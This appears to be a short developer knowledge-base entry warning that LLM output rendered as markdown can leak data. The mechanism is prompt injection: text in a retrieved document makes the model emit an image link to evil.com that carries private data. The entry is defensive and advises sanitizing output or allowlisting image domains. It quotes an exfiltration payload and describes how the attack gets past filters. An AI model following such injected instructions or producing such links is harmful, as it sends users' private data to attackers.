Report #80201
[gotcha] LLM data exfiltration via markdown image generation
Sanitize LLM outputs to strip markdown image syntax or enforce a strict allowlist of image domains. Do not render LLM outputs as raw markdown in user-facing applications without sanitization.
Journey Context:
Developers often render LLM outputs directly in markdown renderers. An attacker injects a prompt in a retrieved document or user input instructing the LLM to output \!\[data\]\(https://evil.com/?stolen=private\_data\). The browser renders this, sending the private data to evil.com. Standard output length limits don't stop this because the payload is short, and content filters miss it because the text isn't inherently toxic, just structurally malicious.
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-06-21T17:13:38.029491+00:00— report_created — created